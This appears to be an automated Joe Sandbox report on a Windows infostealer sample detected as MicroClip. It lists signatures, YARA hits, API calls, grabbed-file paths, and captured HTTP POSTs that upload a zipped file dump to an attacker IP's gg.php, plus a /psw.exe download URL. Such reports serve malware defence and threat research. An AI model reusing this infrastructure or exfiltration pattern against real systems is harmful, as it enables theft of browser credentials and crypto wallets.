Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CwQQqCmqkY.exe

Overview

General Information

Sample name:CwQQqCmqkY.exe
renamed because original name is a hash value
Original sample name:1a477a5659d817b01a50f2a80cb1d76e.exe
Analysis ID:1580848
MD5:1a477a5659d817b01a50f2a80cb1d76e
SHA1:48a07f82c03c9a1b7b3c21caf356f1c67775e359
SHA256:1940ba18ed66dd2f1c3d4dbd2fbf6cf3438bcdee1e108982fb557461106a8073
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

MicroClip
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MicroClip
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • CwQQqCmqkY.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\CwQQqCmqkY.exe" MD5: 1A477A5659D817B01A50F2A80CB1D76E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
CwQQqCmqkY.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
  • 0xe8e4f:$s2: ReflectiveLoader@
SourceRuleDescriptionAuthorStrings
Process Memory Space: CwQQqCmqkY.exe PID: 4144JoeSecurity_MicroClipYara detected MicroClipJoe Security
    SourceRuleDescriptionAuthorStrings
    0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
    • 0xe8e4f:$s2: ReflectiveLoader@
    0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
    • 0xe8e4f:$s2: ReflectiveLoader@
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-26T12:04:19.428611+010028438561A Network Trojan was detected192.168.2.649733185.81.68.14780TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://185.81.68.147/gg.phps64Avira URL Cloud: Label: phishing
    Source: http://185.81.68.147/gg.phpAvira URL Cloud: Label: phishing
    Source: http://185.81.68.147/psw.exeAvira URL Cloud: Label: phishing
    Source: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgAvira URL Cloud: Label: phishing
    Source: http://185.81.68.147/gg.phpReflectiveLoaderAvira URL Cloud: Label: phishing
    Source: http://185.81.68.147/gg.phpspaceAvira URL Cloud: Label: phishing
    Source: CwQQqCmqkY.exeVirustotal: Detection: 26%Perma Link
    Source: CwQQqCmqkY.exeReversingLabs: Detection: 52%
    Source: CwQQqCmqkY.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7650 CryptHashData,0_2_00007FF7F12F7650
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7660 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7F12F7660
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F75D0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,0_2_00007FF7F12F75D0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F1AA0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertFreeCertificateContext,0_2_00007FF7F12F1AA0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF7F12F7B50
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F1EC0 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,0_2_00007FF7F12F1EC0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F9F20 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7F12F9F20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F23F0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,0_2_00007FF7F12F23F0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12CCC50 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7F12CCC50
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F8EC0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,0_2_00007FF7F12F8EC0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F8F40 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7F12F8F40
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F8FD0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00007FF7F12F8FD0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00007FF7F12A7930
    Source: CwQQqCmqkY.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: mov dword ptr [rbp+04h], 424D53FFh0_2_00007FF7F12E2B10
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\miniwallet.bundle.js.LICENSE.txtJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\notification_fast.bundle.js.LICENSE.txtJump to behavior
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831sD source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDD64000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,0_2_00007FF7F132DDD8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1330138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F1330138
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13306C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F13306C8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13309A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,0_2_00007FF7F13309A4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1321B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F1321B60
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\AcrobatJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\FilesJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.6:49733 -> 185.81.68.147:80
    Source: unknownHTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 88734Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3rData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 38 50 9d 58 00 00 00 9a 00 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 8d 8b 5d 0a 80 20 10 06 9f ed 30 62 ac d9 fa dd 26 42 58 c1 7e 68 2b 28 3a 7c 75 81 e8 71 66 18 59 d7 59 31 6f 2a 56 d3 b2 e7 3e a9 1d a6 33 97 d2 d9 7e 1a e0 3d c1 02 64 9c a9 63 a0 c6 c8 8f e1 bb 62 44 1d 62 74 2d 33 35 10 c2 f1 72 f0 1c 98 e8 89 b8 c6 47 55 37 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 00 00 00 00 02 00 00 00 00 00 00 00 1e 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 65 76 65 6e 74 62 65 61 63 6f 6e 73 2e 64 61 74 03 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 30 f1 f3 90 bc 02 00 00 cf 03 00 00 1f 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 68 75 62 2d 73 69 67 6e 61 74 75 72 65 2e 74 78 74 65 92 cb 92 ab 36 14 45 3f e8 56 25 02 cc 4d 33 c8 c0 0f 10 60 5b 1
    Source: global trafficHTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 88734Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3rData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 38 50 9d 58 00 00 00 9a 00 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 8d 8b 5d 0a 80 20 10 06 9f ed 30 62 ac d9 fa dd 26 42 58 c1 7e 68 2b 28 3a 7c 75 81 e8 71 66 18 59 d7 59 31 6f 2a 56 d3 b2 e7 3e a9 1d a6 33 97 d2 d9 7e 1a e0 3d c1 02 64 9c a9 63 a0 c6 c8 8f e1 bb 62 44 1d 62 74 2d 33 35 10 c2 f1 72 f0 1c 98 e8 89 b8 c6 47 55 37 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 00 00 00 00 02 00 00 00 00 00 00 00 1e 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 65 76 65 6e 74 62 65 61 63 6f 6e 73 2e 64 61 74 03 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 30 f1 f3 90 bc 02 00 00 cf 03 00 00 1f 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 68 75 62 2d 73 69 67 6e 61 74 75 72 65 2e 74 78 74 65 92 cb 92 ab 36 14 45 3f e8 56 25 02 cc 4d 33 c8 c0 0f 10 60 5b 1
    Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
    Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B63A0 recv,0_2_00007FF7F12B63A0
    Source: unknownHTTP traffic detected: POST /gg.php HTTP/1.1Host: 185.81.68.147Accept: */*Content-Length: 88734Content-Type: multipart/form-data; boundary=------------------------A4fnrY2DGEqCNctsQoPM3rData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 34 66 6e 72 59 32 44 47 45 71 43 4e 63 74 73 51 6f 50 4d 33 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 67 46 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 e5 18 d9 6a 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 31 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e4 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 bc a6 9f 68 07 00 00 00 05 00 00 00 2d 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 30 2e 32 2e 66 69 6c 74 65 72 74 72 69 65 2e 69 6e 74 65 72 6d 65 64 69 61 74 65 2e 74 78 74 33 e0 34 e2 e5 02 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 3e 4d bf df 07 01 00 00 fc 02 00 00 21 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 31 2d 37 46 65 61 74 75 72 65 43 61 63 68 65 2e 74 78 74 5d 52 5b 12 03 21 08 f3 40 fb 81 22 a8 d3 fb df ab 24 b0 6d b7 e3 d4 95 47 42 80 6a 5b 6d 36 6f 1a 5f 6f 57 eb 71 4e d9 9b 36 be 3b 3c 56 f6 88 d7 c5 db 9a f0 b7 2b 02 e4 15 48 89 33 e3 3d 02 85 c8 8b 6c f3 87 55 23 76 c2 03 ce 15 2f e0 10 f5 f0 69 9c 59 3c 3d 32 80 19 f1 42 4d bc 3b b5 74 22 2c 32 85 d1 d4 84 1a c2 ca a9 16 51 0f 5b 69 0f aa 4c 6d 46 b6 f9 a8 db 4b 9b b0 4b 25 9b 93 77 95 12 20 57 61 52 c9 21 87 b1 66 62 70 c3 93 7d 1d 72 74 56 36 be 4e 69 73 56 ca 3b 27 80 3a ca 0e 84 59 17 33 67 75 03 ff 73 4a a9 04 1b 12 22 e5 a3 ed ce f8 47 e4 d4 b0 8b 1d d6 21 3a 67 ad d4 8b 8e 06 e7 06 be 5d 5b ca ed 3a 7b 9a 9c 43 ce d1 a9 d2 6a ae df f8 a0 f2 41 3e a9 83 0c a5 37 7b 79 da ab fe 69 eb c3 93 15 06 55 38 35 de b6 d3 f7 dc 81 51 f3 ae e9 5a 65 74 6e 30 7d fa 37 09 68 7c 03 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 46 38 50 9d 58 00 00 00 9a 00 00 00 23 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 41 6c 74 65 72 6e 61 74 65 53 65 72 76 69 63 65 73 2e 74 78 74 8d 8b 5d 0a 80 20 10 06 9f ed 30 62 ac d9 fa dd 26 42 58 c1 7e 68 2b 28 3a 7c 75 81 e8 71 66 18 59 d7 59 31 6f 2a 56 d3 b2 e7 3e a9 1d a6 33 97 d2 d9 7e 1a e0 3d c1 02 64 9c a9 63 a0 c6 c8 8f e1 bb 62 44 1d 62 74 2d 33 35 10 c2 f1 72 f0 1c 98 e8 89 b8 c6 47 55 37 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 00 00 00 00 02 00 00 00 00 00 00 00 1e 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 65 76 65 6e 74 62 65 61 63 6f 6e 73 2e 64 61 74 03 00 50 4b 03 04 14 00 00 00 08 00 00 00 20 00 30 f1 f3 90 bc 02 00 00 cf 03 00 00 1f 00 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 68 75 62 2d 73 69 67 6e 61 74 75 72 65 2e 74 78 74 65 92 cb 92 ab 36 14 45 3f e8 56 25 02 cc 4d 33 c8 c0 0f 10 60 5b 1
    Source: CwQQqCmqkY.exeString found in binary or memory: http://185.81.68.147/gg.php
    Source: CwQQqCmqkY.exeString found in binary or memory: http://185.81.68.147/gg.phpReflectiveLoader
    Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/gg.phps64
    Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/gg.phpspace
    Source: CwQQqCmqkY.exe, CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDCFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/psw.exe
    Source: CwQQqCmqkY.exeString found in binary or memory: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg
    Source: CwQQqCmqkY.exeString found in binary or memory: http://www.winimage.com/zLibDll
    Source: CwQQqCmqkY.exeString found in binary or memory: http://www.winimage.com/zLibDll1.3.1-wbr
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/hsts.html
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: CwQQqCmqkY.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_00007FF7F12F7B50

    System Summary

    barindex
    Source: CwQQqCmqkY.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
    Source: 0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
    Source: 0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13312A40_2_00007FF7F13312A4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F129D6900_2_00007FF7F129D690
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132773C0_2_00007FF7F132773C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132FA1C0_2_00007FF7F132FA1C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B3E200_2_00007FF7F12B3E20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1311ED00_2_00007FF7F1311ED0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132E23C0_2_00007FF7F132E23C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F129C8240_2_00007FF7F129C824
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132E7CC0_2_00007FF7F132E7CC
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1330CD80_2_00007FF7F1330CD8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132EB300_2_00007FF7F132EB30
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F129CDD20_2_00007FF7F129CDD2
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13072BC0_2_00007FF7F13072BC
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1322DE80_2_00007FF7F1322DE8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131F19C0_2_00007FF7F131F19C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13074C00_2_00007FF7F13074C0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B94A00_2_00007FF7F12B94A0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13094980_2_00007FF7F1309498
